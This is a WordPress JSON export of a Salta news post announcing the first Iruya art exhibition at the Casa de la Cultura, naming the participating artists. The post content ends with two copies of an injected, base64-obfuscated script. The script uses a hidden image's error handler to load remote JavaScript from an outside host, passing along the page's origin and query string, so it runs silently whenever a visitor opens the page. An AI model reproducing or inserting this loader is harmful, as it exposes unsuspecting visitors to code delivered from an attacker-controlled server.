{"id":2509,"date":"2023-04-14T10:56:18","date_gmt":"2023-04-14T13:56:18","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2509"},"modified":"2025-08-14T00:19:04","modified_gmt":"2025-08-14T03:19:04","slug":"primera-muestra-de-arte-iruyano-en-casa-de-la-cultura","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2509","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/primera-muestra-de-arte-iruyano-en-casa-de-la-cultura-89051\">Primera muestra de Arte Iruyano en Casa de la Cultura<\/a>"},"content":{"rendered":"\n<h3 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#76102a\"><em>Hasta el 25 de abril, estar\u00e1 disponible en Caseros 460 una muestra fotogr\u00e1fica, de literatura, pintura, artesan\u00eda y canto ancestral propias del pueblo de Iruya. La muestra se exhibe con entrada libre y gratuita.<\/em><\/h3>\n\n\n\n<p>Hasta el 25 de abril, en el hall de la Casa de la Cultura, Caseros 460, se realizar\u00e1 la primera muestra de Arte Iruyano. Luis Cruz, gestor cultural y coordinador del Colegio Rural N\u00ba 52 40 mediados por tic, nos comenta \u201clo que hacemos porque venimos trabajando en recuperar y revalorizar nuestro acervo cultural. Como gestores no queremos perder mucho de nuestra cultura y arte, as\u00ed que buscamos despertar inter\u00e9s en nuestros alumnos por este saber ancestral\u201d.<\/p>\n\n\n\n<p>Luis agrega que \u201cdesde hace a\u00f1os participamos en diferentes eventos culturales, esta es la primera muestra de arte que tendr\u00e1 lugar en la Casa de la Cultura, pero anteriormente presentamos \u201cIruya Canta\u201d y \u201cla Mujer es copla\u201d en este escenario\u201d.<\/p>\n\n\n\n<p>Finalmente, el gestor aclara que \u201cen Iruya hay muchos artesanos textiles, en barro, en diferentes disciplinas y estamos dispuestos a trabajar con una finalidad m\u00e1s all\u00e1 de lo hogare\u00f1o o tradicional, sino para posicionar nuestro lugar en el mundo, difundir el arte, visibilizar nuestra comunidad a partir de nuestro quehacer cultural\u201d.<\/p>\n\n\n\n<p>La primera muestra de arte de Iruya realizar\u00e1 una inauguraci\u00f3n simb\u00f3lica en la que participar\u00e1n artistas, residentes e invitados especiales el s\u00e1bado 15 de abril, a partir de las 10.<\/p>\n\n\n\n<p>Participan Mario Guti\u00e9rrez en Artesan\u00eda en barro; Ciro Bustamante, Chorolque Rosa, L\u00f3pez Donata y Alicia Subelza en artesan\u00edas en hilo; Rosa Herrera participar\u00e1 en canto con caja; Elio Cruz en Dibujo, Soledad Canchi en M\u00e1scaras; Norma Madrigal en Pintura; Mar\u00eda Borelli, Mario Choque y Armancho Tacacho en Literatura.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Hasta el 25 de abril, estar\u00e1 disponible en Caseros 460 una muestra fotogr\u00e1fica, de literatura, pintura, artesan\u00eda y canto ancestral propias del pueblo de Iruya. La muestra se exhibe con entrada libre y gratuita. Hasta el 25 de abril, en el hall de la Casa de la Cultura, Caseros 460, se realizar\u00e1 la primera muestra [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2510,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-2509","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2509"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2509"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2509\/revisions"}],"predecessor-version":[{"id":7115,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2509\/revisions\/7115"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2510"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2509"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2509"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2509"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}